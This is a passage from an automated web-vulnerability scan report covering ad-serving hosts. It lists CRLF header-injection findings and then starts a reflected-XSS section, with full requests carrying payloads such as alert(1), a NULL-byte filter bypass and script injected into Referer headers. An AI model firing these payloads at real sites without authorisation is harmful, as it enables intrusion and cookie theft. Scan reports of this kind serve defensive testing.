
GET /adsc/d876089/3/885679/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=9b893%0d%0a01a1d42b0c5

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 16:43:14 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:43:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1; expires=Mon, 30-Apr-2012 08:43:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=9b893
01a1d42b0c5
_876089-5k:xM-0; expires=Mon, 30-Apr-2012 08:43:14 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.35. http://amch.questionmarket.com/adsc/d876089/8/40909683/decide.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/8/40909683/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload be7bc%0d%0a63bff395090 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d876089/8/40909683/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=be7bc%0d%0a63bff395090

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 18:24:43 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 18:24:42 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1; expires=Mon, 30-Apr-2012 10:24:43 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=be7bc
63bff395090
_876089-4T<xM-0; expires=Mon, 30-Apr-2012 10:24:43 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* a208.dl - Wed Mar 09 16:56:36 EST 2011 */
;

1.36. http://amch.questionmarket.com/adscgen/st.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload a8ca6%0d%0aab57d3e3f43 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=876089&site=60649346&code=40909683a8ca6%0d%0aab57d3e3f43&randnum=6149086 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 18:24:04 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a230.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 18:24:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_876089-1-1; expires=Mon, 30-Apr-2012 10:24:04 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-]/; expires=Mon, 30-Apr-2012 10:24:04 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=876089&site=8-60649346-&code=40909683a8ca6
ab57d3e3f43

Content-Length: 0
Content-Type: text/html


1.37. http://amch.questionmarket.com/adscgen/st.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload b4fec%0d%0a280adc6526b was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=876089&site=b4fec%0d%0a280adc6526b&code=40909683&randnum=6149086 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 18:23:59 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 18:23:58 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_876089-1-1; expires=Mon, 30-Apr-2012 10:23:59 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM->/; expires=Mon, 30-Apr-2012 10:23:59 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=876089&site=-1-b4fec
280adc6526b
-&code=40909683
Content-Length: 0
Content-Type: text/html


1.38. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload d3db1%0d%0abd31793905f was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=876089&site=2285373&code=d3db1%0d%0abd31793905f&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 16:39:47 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:39:46 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_876089-1-1; expires=Mon, 30-Apr-2012 08:39:47 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_876089-xh:xM-0; expires=Mon, 30-Apr-2012 08:39:47 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=876089&site=8-2285373-&code=d3db1
bd31793905f

Content-Length: 33
Content-Type: text/html

/* /adsc/d876089/8/-1/randm.js */

1.39. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 308d0%0d%0a7110d05c4d2 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=876089&site=308d0%0d%0a7110d05c4d2&code=4699231&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 16:39:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:39:41 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_876089-1-1; expires=Mon, 30-Apr-2012 08:39:42 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_876089-sh:xM-0; expires=Mon, 30-Apr-2012 08:39:42 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=876089&site=-1-308d0
7110d05c4d2
-&code=4699231
Content-Length: 44
Content-Type: text/html

/* /adsc/d876089/-1/500004699231/randm.js */

1.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload c6825%0d%0a63ad61cc419 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=c6825%0d%0a63ad61cc419&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=8f169462-89d3-413e-9058-30f13d4035793H3030; expires=Wed, 08-Jun-2011 12:23:57 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=c6825
63ad61cc419
&RES=128&WMPV=0; expires=Wed, 08-Jun-2011 12: 23:57 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0


1.41. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload b49be%0d%0a4750443b61 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=0&res=b49be%0d%0a4750443b61 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=b49be
4750443b61
&WMPV=0; expires=Wed, 08-Jun-2011 12: 23:58 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0


1.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4d71c%0d%0a42293c12f4c was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=4d71c%0d%0a42293c12f4c&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1402&BWDate=40612.379687&debuglevel=&FLV=10.2154&RES=128&WMPV=4d71c
42293c12f4c
; expires=Wed, 08-Jun-2011 12: 23:57 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0


2. Cross-site scripting (reflected)
There are 1086 instances of this issue:


2.1. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0055ee3'-alert(1)-'9f815ea7f25 was submitted in the adurl parameter. This input was echoed as 55ee3'-alert(1)-'9f815ea7f25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=%0055ee3'-alert(1)-'9f815ea7f25 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 37225
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:41 GMT
Expires: Thu, 10 Mar 2011 16:45:41 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
zovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=%0055ee3'-alert(1)-'9f815ea7f25http://">
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd8f9"-alert(1)-"daf8fe6749e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7019
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:40 GMT
Expires: Thu, 10 Mar 2011 16:45:40 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749ehttp://ad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWi
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9509f"-alert(1)-"6749c3c0d7d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
